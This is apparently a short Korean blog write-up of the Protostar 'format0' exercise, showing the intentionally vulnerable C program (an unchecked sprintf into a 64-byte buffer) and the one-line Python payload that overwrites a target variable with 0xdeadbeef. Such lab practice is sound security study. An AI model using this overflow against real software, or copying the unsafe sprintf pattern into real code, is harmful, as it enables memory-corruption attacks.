- 
                            
                            format0Exploit-Exercise 2015. 12. 8. 23:32buffer[64] + target(4) 존재 . #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); }root@s0ngsari-virtual-machine:~/Desktop/study/protostar/format# ./format0 $(python -c 'print "\x90"*64 + "\xef\xbe\xad\xde"') you have hit the target correctly :) Segmentation fault (core dumped) 'Exploit-Exercise' 카테고리의 다른 글format1 (0) 2016.08.18 Fusion Level 1 (0) 2016.07.12 stack7 (0) 2015.12.08 stack6 (0) 2015.12.08 Fusion Level 0 (0) 2015.09.09